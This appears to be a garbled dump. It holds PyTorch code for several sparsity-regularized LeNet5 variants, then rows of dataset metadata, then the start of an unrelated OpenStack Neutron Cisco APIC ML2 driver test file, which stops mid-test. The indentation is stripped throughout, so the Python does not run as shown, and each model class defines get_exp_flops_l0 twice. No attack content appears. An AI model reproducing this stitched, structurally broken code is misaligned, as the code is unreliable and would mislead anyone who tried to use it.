regularization += - (1. / self.N) * layer.regularization()
if torch.cuda.is_available():
regularization = regularization.cuda()
return regularization
def get_exp_flops_l0(self):
expected_flops, expected_l0 = 0., 0.
for layer in self.layers:
e_fl, e_l0 = layer.count_expected_flops_and_l0()
expected_flops += e_fl
expected_l0 += e_l0
return expected_flops, expected_l0
def update_ema(self):
self.steps_ema += 1
for p, avg_p in zip(self.parameters(), self.avg_param):
avg_p.mul_(self.beta_ema).add_((1 - self.beta_ema) * p.data)
def load_ema_params(self):
for p, avg_p in zip(self.parameters(), self.avg_param):
p.data.copy_(avg_p / (1 - self.beta_ema**self.steps_ema))
def load_params(self, params):
for p, avg_p in zip(self.parameters(), params):
p.data.copy_(avg_p)
def get_params(self):
params = deepcopy(list(p.data for p in self.parameters()))
return params
def get_w_sparsity(self):
sparsity_num = 0.
sparsity_denom = 0.
for layer in self.layers:
sparsity_num += layer.count_zero_w()
sparsity_denom += layer.count_weight()
return sparsity_num/sparsity_denom
def count_active_neuron(self):
neuron = 0
for layer in self.layers:
neuron += layer.count_active_neuron()
return neuron
def count_total_neuron(self):
neuron = 0
for layer in self.layers:
if isinstance(layer, group_relaxed_L0Dense) or isinstance(layer, MAPConv2d) or isinstance(layer, group_relaxed_L0Conv2d):
neuron+=layer.count_total_neuron()
return neuron
def count_reg_neuron_sparsity(self):
neuron = 0
total = 0
for layer in self.layers:
if isinstance(layer, group_relaxed_L0Conv2d) or isinstance(layer,group_relaxed_L0Dense):
neuron+=layer.count_active_neuron()
total+=layer.count_total_neuron()
return 1-neuron/total
def get_exp_flops_l0(self):
expected_flops, expected_l0 = 0., 0.
for layer in self.layers:
try:
e_fl, e_l0 = layer.count_expected_flops_and_l0()
expected_flops += e_fl
expected_l0 += e_l0
except:
pass
return expected_flops, expected_l0
class group_relaxed_L1LeNet5(nn.Module):
def __init__(self, num_classes, input_size=(1, 28, 28), conv_dims=(20, 50), fc_dims=500,
N=50000, beta_ema=0., weight_decay=1, lambas=(1., 1., 1., 1.), beta=4, local_rep=False,
temperature=2./3.):
super(group_relaxed_L1LeNet5, self).__init__()
self.N = N
assert(len(conv_dims) == 2)
self.conv_dims = conv_dims
self.fc_dims = fc_dims
self.beta_ema = beta_ema
self.weight_decay = weight_decay
convs = [group_relaxed_L1Conv2d(input_size[0], conv_dims[0], 5, droprate_init=0.5, temperature=temperature,
weight_decay=self.weight_decay, lamba=lambas[0], beta=beta, local_rep=local_rep),
nn.ReLU(), nn.MaxPool2d(2),
group_relaxed_L1Conv2d(conv_dims[0], conv_dims[1], 5, droprate_init=0.5, temperature=temperature,
weight_decay=self.weight_decay, lamba=lambas[1], beta=beta, local_rep=local_rep),
nn.ReLU(), nn.MaxPool2d(2)]
self.convs = nn.Sequential(*convs)
if torch.cuda.is_available():
self.convs = self.convs.cuda()
flat_fts = get_flat_fts(input_size, self.convs)
fcs = [group_relaxed_L1Dense(flat_fts, self.fc_dims, droprate_init=0.5, weight_decay=self.weight_decay,
lamba=lambas[2], beta=beta, local_rep=local_rep, temperature=temperature), nn.ReLU(),
group_relaxed_L1Dense(self.fc_dims, num_classes, droprate_init=0.5, weight_decay=self.weight_decay,
lamba=lambas[3], beta=beta, local_rep=local_rep, temperature=temperature)]
self.fcs = nn.Sequential(*fcs)
self.layers = []
for m in self.modules():
if isinstance(m, group_relaxed_L1Dense) or isinstance(m, group_relaxed_L1Conv2d):
self.layers.append(m)
if beta_ema > 0.:
print('Using temporal averaging with beta: {}'.format(beta_ema))
self.avg_param = deepcopy(list(p.data for p in self.parameters()))
if torch.cuda.is_available():
self.avg_param = [a.cuda() for a in self.avg_param]
self.steps_ema = 0.
def forward(self, x):
o = self.convs(x)
o = o.view(o.size(0), -1)
return self.fcs(o)
def regularization(self):
regularization = 0.
for layer in self.layers:
regularization += - (1. / self.N) * layer.regularization()
if torch.cuda.is_available():
regularization = regularization.cuda()
return regularization
def get_exp_flops_l0(self):
expected_flops, expected_l0 = 0., 0.
for layer in self.layers:
e_fl, e_l0 = layer.count_expected_flops_and_l0()
expected_flops += e_fl
expected_l0 += e_l0
return expected_flops, expected_l0
def update_ema(self):
self.steps_ema += 1
for p, avg_p in zip(self.parameters(), self.avg_param):
avg_p.mul_(self.beta_ema).add_((1 - self.beta_ema) * p.data)
def load_ema_params(self):
for p, avg_p in zip(self.parameters(), self.avg_param):
p.data.copy_(avg_p / (1 - self.beta_ema**self.steps_ema))
def load_params(self, params):
for p, avg_p in zip(self.parameters(), params):
p.data.copy_(avg_p)
def get_params(self):
params = deepcopy(list(p.data for p in self.parameters()))
return params
def get_w_sparsity(self):
sparsity_num = 0.
sparsity_denom = 0.
for layer in self.layers:
sparsity_num += layer.count_zero_w()
sparsity_denom += layer.count_weight()
return sparsity_num/sparsity_denom
def count_active_neuron(self):
neuron = 0
for layer in self.layers:
neuron += layer.count_active_neuron()
return neuron
def count_total_neuron(self):
neuron = 0
for layer in self.layers:
if isinstance(layer, group_relaxed_L1Dense) or isinstance(layer, MAPConv2d) or isinstance(layer, group_relaxed_L1Conv2d):
neuron+=layer.count_total_neuron()
return neuron
def count_reg_neuron_sparsity(self):
neuron = 0
total = 0
for layer in self.layers:
if isinstance(layer, group_relaxed_L1Conv2d) or isinstance(layer,group_relaxed_L1Dense):
neuron+=layer.count_active_neuron()
total+=layer.count_total_neuron()
return 1-neuron/total
def get_exp_flops_l0(self):
expected_flops, expected_l0 = 0., 0.
for layer in self.layers:
try:
e_fl, e_l0 = layer.count_expected_flops_and_l0()
expected_flops += e_fl
expected_l0 += e_l0
except:
pass
return expected_flops, expected_l0
class group_relaxed_L1L2LeNet5(nn.Module):
def __init__(self, num_classes, input_size=(1, 28, 28), conv_dims=(20, 50), fc_dims=500,
N=50000, beta_ema=0., weight_decay=1, lambas=(1., 1., 1., 1.), beta=4, local_rep=False,
temperature=2./3.):
super(group_relaxed_L1L2LeNet5, self).__init__()
self.N = N
assert(len(conv_dims) == 2)
self.conv_dims = conv_dims
self.fc_dims = fc_dims
self.beta_ema = beta_ema
self.weight_decay = weight_decay
convs = [group_relaxed_L1L2Conv2d(input_size[0], conv_dims[0], 5, droprate_init=0.5, temperature=temperature,
weight_decay=self.weight_decay, lamba=lambas[0], beta=beta, local_rep=local_rep),
nn.ReLU(), nn.MaxPool2d(2),
group_relaxed_L1L2Conv2d(conv_dims[0], conv_dims[1], 5, droprate_init=0.5, temperature=temperature,
weight_decay=self.weight_decay, lamba=lambas[1], beta=beta, local_rep=local_rep),
nn.ReLU(), nn.MaxPool2d(2)]
self.convs = nn.Sequential(*convs)
if torch.cuda.is_available():
self.convs = self.convs.cuda()
flat_fts = get_flat_fts(input_size, self.convs)
fcs = [group_relaxed_L1L2Dense(flat_fts, self.fc_dims, droprate_init=0.5, weight_decay=self.weight_decay,
lamba=lambas[2], beta=beta, local_rep=local_rep, temperature=temperature), nn.ReLU(),
group_relaxed_L1L2Dense(self.fc_dims, num_classes, droprate_init=0.5, weight_decay=self.weight_decay,
lamba=lambas[3], beta=beta, local_rep=local_rep, temperature=temperature)]
self.fcs = nn.Sequential(*fcs)
self.layers = []
for m in self.modules():
if isinstance(m, group_relaxed_L1L2Dense) or isinstance(m, group_relaxed_L1L2Conv2d):
self.layers.append(m)
if beta_ema > 0.:
print('Using temporal averaging with beta: {}'.format(beta_ema))
self.avg_param = deepcopy(list(p.data for p in self.parameters()))
if torch.cuda.is_available():
self.avg_param = [a.cuda() for a in self.avg_param]
self.steps_ema = 0.
def forward(self, x):
o = self.convs(x)
o = o.view(o.size(0), -1)
return self.fcs(o)
def regularization(self):
regularization = 0.
for layer in self.layers:
regularization += - (1. / self.N) * layer.regularization()
if torch.cuda.is_available():
regularization = regularization.cuda()
return regularization
def get_exp_flops_l0(self):
expected_flops, expected_l0 = 0., 0.
for layer in self.layers:
e_fl, e_l0 = layer.count_expected_flops_and_l0()
expected_flops += e_fl
expected_l0 += e_l0
return expected_flops, expected_l0
def update_ema(self):
self.steps_ema += 1
for p, avg_p in zip(self.parameters(), self.avg_param):
avg_p.mul_(self.beta_ema).add_((1 - self.beta_ema) * p.data)
def load_ema_params(self):
for p, avg_p in zip(self.parameters(), self.avg_param):
p.data.copy_(avg_p / (1 - self.beta_ema**self.steps_ema))
def load_params(self, params):
for p, avg_p in zip(self.parameters(), params):
p.data.copy_(avg_p)
def get_params(self):
params = deepcopy(list(p.data for p in self.parameters()))
return params
def get_w_sparsity(self):
sparsity_num = 0.
sparsity_denom = 0.
for layer in self.layers:
sparsity_num += layer.count_zero_w()
sparsity_denom += layer.count_weight()
return sparsity_num/sparsity_denom
def count_active_neuron(self):
neuron = 0
for layer in self.layers:
neuron += layer.count_active_neuron()
return neuron
def count_total_neuron(self):
neuron = 0
for layer in self.layers:
if isinstance(layer, group_relaxed_L1L2Dense) or isinstance(layer, MAPConv2d) or isinstance(layer, group_relaxed_L1L2Conv2d):
neuron+=layer.count_total_neuron()
return neuron
def count_reg_neuron_sparsity(self):
neuron = 0
total = 0
for layer in self.layers:
if isinstance(layer, group_relaxed_L1L2Conv2d) or isinstance(layer,group_relaxed_L1L2Dense):
neuron+=layer.count_active_neuron()
total+=layer.count_total_neuron()
return 1-neuron/total
def get_exp_flops_l0(self):
expected_flops, expected_l0 = 0., 0.
for layer in self.layers:
try:
e_fl, e_l0 = layer.count_expected_flops_and_l0()
expected_flops += e_fl
expected_l0 += e_l0
except:
pass
return expected_flops, expected_l0
class group_relaxed_TF1LeNet5(nn.Module):
def __init__(self, num_classes, input_size=(1, 28, 28), conv_dims=(20, 50), fc_dims=500,
N=50000, beta_ema=0., weight_decay=1, lambas=(1., 1., 1., 1.), alpha = 1., beta=4, local_rep=False,
temperature=2./3.):
super(group_relaxed_TF1LeNet5, self).__init__()
self.N = N
assert(len(conv_dims) == 2)
self.conv_dims = conv_dims
self.fc_dims = fc_dims
self.beta_ema = beta_ema
self.weight_decay = weight_decay
convs = [group_relaxed_TF1Conv2d(input_size[0], conv_dims[0], 5, droprate_init=0.5, temperature=temperature,
weight_decay=self.weight_decay, lamba=lambas[0], alpha=alpha, beta=beta, local_rep=local_rep),
nn.ReLU(), nn.MaxPool2d(2),
group_relaxed_TF1Conv2d(conv_dims[0], conv_dims[1], 5, droprate_init=0.5, temperature=temperature,
weight_decay=self.weight_decay, lamba=lambas[1], alpha = alpha, beta=beta, local_rep=local_rep),
nn.ReLU(), nn.MaxPool2d(2)]
self.convs = nn.Sequential(*convs)
if torch.cuda.is_available():
self.convs = self.convs.cuda()
flat_fts = get_flat_fts(input_size, self.convs)
fcs = [group_relaxed_TF1Dense(flat_fts, self.fc_dims, droprate_init=0.5, weight_decay=self.weight_decay,
lamba=lambas[2], alpha = alpha, beta=beta, local_rep=local_rep, temperature=temperature), nn.ReLU(),
group_relaxed_TF1Dense(self.fc_dims, num_classes, droprate_init=0.5, weight_decay=self.weight_decay,
lamba=lambas[3], alpha = alpha, beta=beta, local_rep=local_rep, temperature=temperature)]
self.fcs = nn.Sequential(*fcs)
self.layers = []
for m in self.modules():
if isinstance(m, group_relaxed_TF1Dense) or isinstance(m, group_relaxed_TF1Conv2d):
self.layers.append(m)
if beta_ema > 0.:
print('Using temporal averaging with beta: {}'.format(beta_ema))
self.avg_param = deepcopy(list(p.data for p in self.parameters()))
if torch.cuda.is_available():
self.avg_param = [a.cuda() for a in self.avg_param]
self.steps_ema = 0.
def forward(self, x):
o = self.convs(x)
o = o.view(o.size(0), -1)
return self.fcs(o)
def regularization(self):
regularization = 0.
for layer in self.layers:
regularization += - (1. / self.N) * layer.regularization()
if torch.cuda.is_available():
regularization = regularization.cuda()
return regularization
def get_exp_flops_l0(self):
expected_flops, expected_l0 = 0., 0.
for layer in self.layers:
e_fl, e_l0 = layer.count_expected_flops_and_l0()
expected_flops += e_fl
expected_l0 += e_l0
return expected_flops, expected_l0
def update_ema(self):
self.steps_ema += 1
for p, avg_p in zip(self.parameters(), self.avg_param):
avg_p.mul_(self.beta_ema).add_((1 - self.beta_ema) * p.data)
def load_ema_params(self):
for p, avg_p in zip(self.parameters(), self.avg_param):
p.data.copy_(avg_p / (1 - self.beta_ema**self.steps_ema))
def load_params(self, params):
for p, avg_p in zip(self.parameters(), params):
p.data.copy_(avg_p)
def get_params(self):
params = deepcopy(list(p.data for p in self.parameters()))
return params
def get_w_sparsity(self):
sparsity_num = 0.
sparsity_denom = 0.
for layer in self.layers:
sparsity_num += layer.count_zero_w()
sparsity_denom += layer.count_weight()
return sparsity_num/sparsity_denom
def count_active_neuron(self):
neuron = 0
for layer in self.layers:
neuron += layer.count_active_neuron()
return neuron
def count_total_neuron(self):
neuron = 0
for layer in self.layers:
if isinstance(layer, group_relaxed_TF1Dense) or isinstance(layer, MAPConv2d) or isinstance(layer, group_relaxed_TF1Conv2d):
neuron+=layer.count_total_neuron()
return neuron
def count_reg_neuron_sparsity(self):
neuron = 0
total = 0
for layer in self.layers:
if isinstance(layer, group_relaxed_TF1Conv2d) or isinstance(layer,group_relaxed_TF1Dense):
neuron+=layer.count_active_neuron()
total+=layer.count_total_neuron()
return 1-neuron/total
def get_exp_flops_l0(self):
expected_flops, expected_l0 = 0., 0.
for layer in self.layers:
try:
e_fl, e_l0 = layer.count_expected_flops_and_l0()
expected_flops += e_fl
expected_l0 += e_l0
except:
pass
return expected_flops, expected_l0
class group_relaxed_SCADLeNet5(nn.Module):
def __init__(self, num_classes, input_size=(1, 28, 28), conv_dims=(20, 50), fc_dims=500,
N=50000, beta_ema=0., weight_decay=1, lambas=(1., 1., 1., 1.), beta=4, local_rep=False,
temperature=2./3.):
super(group_relaxed_SCADLeNet5, self).__init__()
self.N = N
assert(len(conv_dims) == 2)
self.conv_dims = conv_dims
self.fc_dims = fc_dims
self.beta_ema = beta_ema
self.weight_decay = weight_decay
convs = [group_relaxed_SCAD_Conv2d(input_size[0], conv_dims[0], 5, droprate_init=0.5, temperature=temperature,
weight_decay=self.weight_decay, lamba=lambas[0], beta=beta, local_rep=local_rep),
nn.ReLU(), nn.MaxPool2d(2),
group_relaxed_SCAD_Conv2d(conv_dims[0], conv_dims[1], 5, droprate_init=0.5, temperature=temperature,
weight_decay=self.weight_decay, lamba=lambas[1], beta=beta, local_rep=local_rep),
nn.ReLU(), nn.MaxPool2d(2)]
self.convs = nn.Sequential(*convs)
if torch.cuda.is_available():
self.convs = self.convs.cuda()
flat_fts = get_flat_fts(input_size, self.convs)
fcs = [group_relaxed_SCAD_Dense(flat_fts, self.fc_dims, droprate_init=0.5, weight_decay=self.weight_decay,
lamba=lambas[2], beta=beta, local_rep=local_rep, temperature=temperature), nn.ReLU(),
group_relaxed_SCAD_Dense(self.fc_dims, num_classes, droprate_init=0.5, weight_decay=self.weight_decay,
lamba=lambas[3], beta=beta, local_rep=local_rep, temperature=temperature)]
self.fcs = nn.Sequential(*fcs)
self.layers = []
for m in self.modules():
if isinstance(m, group_relaxed_SCAD_Dense) or isinstance(m, group_relaxed_SCAD_Conv2d):
self.layers.append(m)
if beta_ema > 0.:
print('Using temporal averaging with beta: {}'.format(beta_ema))
self.avg_param = deepcopy(list(p.data for p in self.parameters()))
if torch.cuda.is_available():
self.avg_param = [a.cuda() for a in self.avg_param]
self.steps_ema = 0.
def forward(self, x):
o = self.convs(x)
o = o.view(o.size(0), -1)
return self.fcs(o)
def regularization(self):
regularization = 0.
for layer in self.layers:
regularization += - (1. / self.N) * layer.regularization()
if torch.cuda.is_available():
regularization = regularization.cuda()
return regularization
def get_exp_flops_l0(self):
expected_flops, expected_l0 = 0., 0.
for layer in self.layers:
e_fl, e_l0 = layer.count_expected_flops_and_l0()
expected_flops += e_fl
expected_l0 += e_l0
return expected_flops, expected_l0
def update_ema(self):
self.steps_ema += 1
for p, avg_p in zip(self.parameters(), self.avg_param):
avg_p.mul_(self.beta_ema).add_((1 - self.beta_ema) * p.data)
def load_ema_params(self):
for p, avg_p in zip(self.parameters(), self.avg_param):
p.data.copy_(avg_p / (1 - self.beta_ema**self.steps_ema))
def load_params(self, params):
for p, avg_p in zip(self.parameters(), params):
p.data.copy_(avg_p)
def get_params(self):
params = deepcopy(list(p.data for p in self.parameters()))
return params
def get_w_sparsity(self):
sparsity_num = 0.
sparsity_denom = 0.
for layer in self.layers:
sparsity_num += layer.count_zero_w()
sparsity_denom += layer.count_weight()
return sparsity_num/sparsity_denom
def count_active_neuron(self):
neuron = 0
for layer in self.layers:
neuron += layer.count_active_neuron()
return neuron
def count_total_neuron(self):
neuron = 0
for layer in self.layers:
if isinstance(layer, group_relaxed_SCAD_Dense) or isinstance(layer, MAPConv2d) or isinstance(layer, group_relaxed_SCAD_Conv2d):
neuron+=layer.count_total_neuron()
return neuron
def count_reg_neuron_sparsity(self):
neuron = 0
total = 0
for layer in self.layers:
if isinstance(layer, group_relaxed_SCAD_Conv2d) or isinstance(layer,group_relaxed_SCAD_Dense):
neuron+=layer.count_active_neuron()
total+=layer.count_total_neuron()
return 1-neuron/total
def get_exp_flops_l0(self):
expected_flops, expected_l0 = 0., 0.
for layer in self.layers:
try:
e_fl, e_l0 = layer.count_expected_flops_and_l0()
expected_flops += e_fl
expected_l0 += e_l0
except:
pass
return expected_flops, expected_l0
| 39.017946
| 139
| 0.605775
| 5,210
| 39,135
| 4.294434
| 0.027063
| 0.043265
| 0.022124
| 0.02704
| 0.975954
| 0.95754
| 0.954188
| 0.951327
| 0.948914
| 0.932332
| 0
| 0.028401
| 0.288335
| 39,135
| 1,002
| 140
| 39.056886
| 0.774945
| 0
| 0
| 0.889831
| 0
| 0
| 0.007768
| 0
| 0
| 0
| 0
| 0
| 0.009685
| 1
| 0.124697
| false
| 0.009685
| 0.009685
| 0
| 0.230024
| 0.010896
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7eff221a882cc562deac349423b1db1f562605ec
| 267,578
|
py
|
Python
|
apic_ml2/neutron/tests/unit/ml2/drivers/cisco/apic/test_cisco_apic_mechanism_driver.py
|
noironetworks/apic-ml2-driver
|
9093d766d2e17ceccf948bc51e2963d655ce4f37
|
[
"Apache-2.0"
] | 8
|
2015-06-12T09:41:29.000Z
|
2021-02-19T05:41:39.000Z
|
apic_ml2/neutron/tests/unit/ml2/drivers/cisco/apic/test_cisco_apic_mechanism_driver.py
|
noironetworks/apic-ml2-driver
|
9093d766d2e17ceccf948bc51e2963d655ce4f37
|
[
"Apache-2.0"
] | 57
|
2015-09-12T07:19:34.000Z
|
2020-02-11T12:57:54.000Z
|
apic_ml2/neutron/tests/unit/ml2/drivers/cisco/apic/test_cisco_apic_mechanism_driver.py
|
noironetworks/apic-ml2-driver
|
9093d766d2e17ceccf948bc51e2963d655ce4f37
|
[
"Apache-2.0"
] | 12
|
2015-10-13T12:29:12.000Z
|
2019-04-10T08:09:54.000Z
|
# Copyright (c) 2014 Cisco Systems
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import base64
import copy
import hashlib
import hmac
import re
import sys
import tempfile
from apicapi import apic_client
from apicapi import apic_manager
from apicapi import apic_mapper
import mock
import netaddr
from neutron.api import extensions
from neutron.common import constants as n_constants
from neutron import context
from neutron.db import api as db_api
from neutron.db import db_base_plugin_v2 # noqa
from neutron.db import models_v2 # noqa
from neutron.extensions import portbindings
from neutron import manager
from neutron.plugins.ml2 import db as ml2_db
from neutron.plugins.ml2 import driver_api as api
from neutron.plugins.ml2 import driver_context
from neutron.plugins.ml2.drivers import type_vlan # noqa
from neutron.tests.unit.api import test_extensions
from neutron.tests.unit.db import test_db_base_plugin_v2 as test_plugin
from neutron.tests.unit import testlib_api
from opflexagent import constants as ofcst
from oslo_serialization import jsonutils as json
# Mock the opflex agent type driver, and its constants,
# so that we can test port binding to opflex networks
T_DRV = "opflexagent.type_opflex"
sys.modules["opflexagent"] = mock.Mock()
sys.modules["opflexagent"].constants.TYPE_OPFLEX = 'opflex'
sys.modules["opflexagent"].constants.AGENT_TYPE_OPFLEX_OVS = (
'OpFlex Open vSwitch agent')
sys.modules[T_DRV] = mock.Mock()
sys.modules[T_DRV].OpflexTypeDriver().get_type.return_value = 'opflex'
sys.modules[T_DRV].OpflexTypeDriver().allocate_tenant_segment.return_value = (
{api.NETWORK_TYPE: ofcst.TYPE_OPFLEX,
api.PHYSICAL_NETWORK: 'physnet1'})
from apic_ml2.neutron.db import port_ha_ipaddress_binding as ha
from apic_ml2.neutron.plugins.ml2.drivers.cisco.apic import (
extension_db as extn_db)
from apic_ml2.neutron.plugins.ml2.drivers.cisco.apic import (
mechanism_apic as md)
from apic_ml2.neutron.plugins.ml2.drivers.cisco.apic import (
rpc as mech_rpc)
from apic_ml2.neutron.plugins.ml2.drivers.cisco.apic import constants as acst
from apic_ml2.neutron.services.l3_router import apic_driver as driver
from apic_ml2.neutron.tests.unit.ml2.drivers.cisco.apic import (
test_cisco_apic_common as mocked)
sys.modules["apicapi"].apic_manager.EXT_EPG = mocked.APIC_EXT_EPG
HOST_ID1 = 'ubuntu'
HOST_ID2 = 'rhel'
ENCAP = '101'
SUBNET_GATEWAY = '10.3.2.1'
SUBNET_CIDR = '10.3.1.0/24'
SUBNET_NETMASK = '24'
TEST_SEGMENT1 = 'test-segment1'
TEST_SEGMENT2 = 'test-segment2'
BOOKED_PORT_VALUE = 'myBookedPort'
PLUGIN_NAME = 'neutron.plugins.ml2.plugin.Ml2Plugin'
AGENT_TYPE = n_constants.AGENT_TYPE_OVS
AGENT_CONF = {'alive': True, 'binary': 'somebinary',
'topic': 'sometopic', 'agent_type': AGENT_TYPE,
'configurations': {'opflex_networks': None,
'bridge_mappings': {'physnet1': 'br-eth1'}}}
AGENT_TYPE_DVS = acst.AGENT_TYPE_DVS
AGENT_CONF_DVS = {'alive': True, 'binary': 'anotherbinary',
'topic': 'anothertopic', 'agent_type': AGENT_TYPE_DVS,
'configurations': {'opflex_networks': None}}
AGENT_CONF_OPFLEX = {'alive': True, 'binary': 'somebinary',
'topic': 'sometopic',
'agent_type': ofcst.AGENT_TYPE_OPFLEX_OVS,
'configurations': {
'opflex_networks': None,
'bridge_mappings': {'physnet1': 'br-eth1'}}}
APIC_EXTERNAL_RID = '1.0.0.1'
TEST_TENANT = test_plugin.TEST_TENANT_ID
ALLOW_ROUTE_LEAK = 'apic:allow_route_leak'
USE_ROUTING_CONTEXT = 'apic:use_routing_context'
def echo(context, id, prefix=''):
return id if not prefix else (prefix + id)
def name(name):
return name
def equal(x, y):
return str(x) == str(y)
class ApicML2IntegratedTestBase(test_plugin.NeutronDbPluginV2TestCase,
mocked.ControllerMixin, mocked.ConfigMixin,
mocked.ApicDBTestBase):
_extension_drivers = ['port_security', 'apic_ml2']
def setUp(self, service_plugins=None, ml2_opts=None):
mocked.ControllerMixin.set_up_mocks(self)
mocked.ConfigMixin.set_up_mocks(self, ml2_opts=ml2_opts)
self.override_conf('integrated_topology_service', True,
'ml2_cisco_apic')
self.override_conf('per_tenant_context', False,
'ml2_cisco_apic')
self.override_conf('extension_drivers',
self._extension_drivers,
group='ml2')
self.override_conf('path_mtu', 1000, group='ml2')
self.override_conf('global_physnet_mtu', 1000)
self.override_conf('advertise_mtu', True, None)
service_plugins = (
service_plugins or
{'L3_ROUTER_NAT': 'apic_ml2.neutron.services.l3_router.'
'l3_apic.ApicL3ServicePlugin',
'flavors_plugin_name': 'neutron.services.flavors.'
'flavors_plugin.FlavorsPlugin'})
mock.patch('apic_ml2.neutron.plugins.ml2.drivers.'
'cisco.apic.nova_client.NovaClient').start()
apic_client.RestClient = mock.Mock()
apic_manager.APICManager.ensure_infra_created_on_apic = mock.Mock()
apic_manager.APICManager.ensure_bgp_pod_policy_created_on_apic = (
mock.Mock())
apic_mapper.ApicName.__eq__ = equal
super(ApicML2IntegratedTestBase, self).setUp(
PLUGIN_NAME, service_plugins=service_plugins)
ext_mgr = extensions.PluginAwareExtensionManager.get_instance()
self.ext_api = test_extensions.setup_extensions_middleware(ext_mgr)
self.plugin.remove_networks_from_down_agents = mock.Mock()
self.plugin.is_agent_down = mock.Mock(return_value=False)
self.driver = self.plugin.mechanism_manager.mech_drivers[
'cisco_apic_ml2'].obj
self.synchronizer = mock.Mock()
md.importutils = mock.Mock()
md.APICMechanismDriver.get_base_synchronizer = mock.Mock(
return_value=self.synchronizer)
self.driver.name_mapper.aci_mapper.tenant = echo
self.driver.apic_manager.apic = mock.Mock()
self.driver.apic_manager.apic.transaction = self.fake_transaction
self.rpc = self.driver.topology_endpoints[0]
self.db = self.driver.apic_manager.db
for switch in self.switch_dict:
for module_port in self.switch_dict[switch]:
module, port = module_port.split('/', 1)
hosts = self.switch_dict[switch][module_port]
for host in hosts:
self.driver.apic_manager.add_hostlink(
host, 'static', None, switch, module, port)
self.mgr = self.driver.apic_manager
self.mgr.apic.fvTenant.name = name
self.mgr.apic.fvCtx.name = name
self.l3_plugin = manager.NeutronManager.get_service_plugins()[
'L3_ROUTER_NAT']
self.driver.apic_manager.vmm_shared_secret = base64.b64encode(
'dirtylittlesecret')
self.driver.notifier = mock.Mock()
self.driver._query_external_EPG = mock.Mock()
self.driver._query_external_EPG.return_value = ['5.5.5.0/24',
'6.6.6.0/24']
def _mock_external_dict(self, data, is_edge_nat=False):
self.driver.apic_manager.ext_net_dict = {}
for x in data:
self.driver.apic_manager.ext_net_dict.update(
self._build_external_dict(x[0], x[1], is_edge_nat=is_edge_nat))
def _build_external_dict(self, name, cidr_exposed, nat_enabled=True,
is_edge_nat=False):
ext_info = {
'enable_nat': 'True' if nat_enabled else 'False'
}
ext_info.update({
'switch': mocked.APIC_EXT_SWITCH,
'port': mocked.APIC_EXT_MODULE + '/' + mocked.APIC_EXT_PORT,
'encap': mocked.APIC_EXT_ENCAP,
'router_id': APIC_EXTERNAL_RID,
'gateway_ip': str(netaddr.IPNetwork(cidr_exposed)[1]),
'cidr_exposed': cidr_exposed})
if is_edge_nat:
ext_info['edge_nat'] = 'true'
ext_info['vlan_range'] = '2000:2010'
return {name: ext_info}
def _register_agent(self, host, agent_cfg=AGENT_CONF):
plugin = manager.NeutronManager.get_plugin()
ctx = context.get_admin_context()
agent = {'host': host}
agent.update(agent_cfg)
plugin.create_or_update_agent(ctx, agent)
def _bind_port_to_host(self, port_id, host):
data = {'port': {'binding:host_id': host,
'device_owner': 'compute:',
'device_id': 'someid'}}
# Create EP with bound port
req = self.new_update_request('ports', data, port_id,
self.fmt)
return self.deserialize(self.fmt, req.get_response(self.api))
def _bind_dhcp_port_to_host(self, port_id, host):
data = {'port': {'binding:host_id': host,
'device_owner': 'network:dhcp',
'device_id': 'someid'}}
# Create EP with bound port
req = self.new_update_request('ports', data, port_id,
self.fmt)
return self.deserialize(self.fmt, req.get_response(self.api))
def _check_call_list(self, expected, observed):
for obs in observed:
if len(obs[0]) > 1 and type(obs[0][1]) is dict and (
'fixed_ips' in obs[0][1]):
obs[0][1]['fixed_ips'][0]['ip_address'] = ''
for call in expected:
if len(call[1]) > 1 and type(call[1][1]) is dict and (
'fixed_ips' in call[1][1]):
call[1][1]['fixed_ips'][0]['ip_address'] = ''
self.assertTrue(call in observed,
msg='Call not found, expected:\n%s\nobserved:'
'\n%s' % (str(call), str(observed)))
observed.remove(call)
self.assertFalse(
len(observed),
msg='There are more calls than expected: %s' % str(observed))
def _add_hosts_to_apic(self, num, vpc=False):
for x in range(1, num + 1):
self.db.add_hostlink(
'h%s' % x, 'eth0' if vpc else 'static', None, str(x),
'1', str(x))
if vpc:
self.db.add_hostlink(
'h%s' % x, 'eth1', None, str(x + 1), '1', str(x))
self.rpc.peers = self.rpc._load_peers()
def _get_gbp_details(self, port_id, host):
return self.driver.get_gbp_details(
context.get_admin_context(),
device='tap%s' % port_id, host=host)
def _request_endpoint_details(self, port_id, host, timestamp=None,
request_id=None):
return self.driver.request_endpoint_details(
context.get_admin_context(),
request={'device': 'tap%s' % port_id, 'timestamp': 0,
'request_id': 'request_id'}, host=host)
def _check_ip_in_cidr(self, ip_addr, cidr):
self.assertTrue(netaddr.IPAddress(ip_addr) in netaddr.IPNetwork(cidr))
class ApicML2IntegratedTestCase(ApicML2IntegratedTestBase):
def test_network_visibility(self):
net = self.create_network(tenant_id='onetenant',
expected_res_status=201)['network']
# Visible by onetenant
self.show_network(net['id'], tenant_id='onetenant',
expected_res_status=200)
# Not visible by anothertenant
self.show_network(net['id'], tenant_id='anothertenant',
expected_res_status=404)
# Visible by admintenant
self.show_network(net['id'], tenant_id='admintenant',
is_admin_context=True, expected_res_status=200)
def test_shared_network_visibility(self):
net = self.create_network(
tenant_id='onetenant', expected_res_status=201, shared=True,
is_admin_context=True)['network']
# Visible by onetenant
self.show_network(net['id'], tenant_id='onetenant',
expected_res_status=200)
# Visible by anothertenant
self.show_network(net['id'], tenant_id='anothertenant',
expected_res_status=200)
# Visible by admintenant
self.show_network(net['id'], tenant_id='admintenant',
is_admin_context=True, expected_res_status=200)
def test_port_on_shared_non_opflex_network(self):
self._register_agent('h1')
net = self.create_network(
tenant_id='onetenant', expected_res_status=201, shared=True,
is_admin_context=True)['network']
sub = self.create_subnet(
network_id=net['id'], cidr='192.168.0.0/24',
ip_version=4, is_admin_context=True)
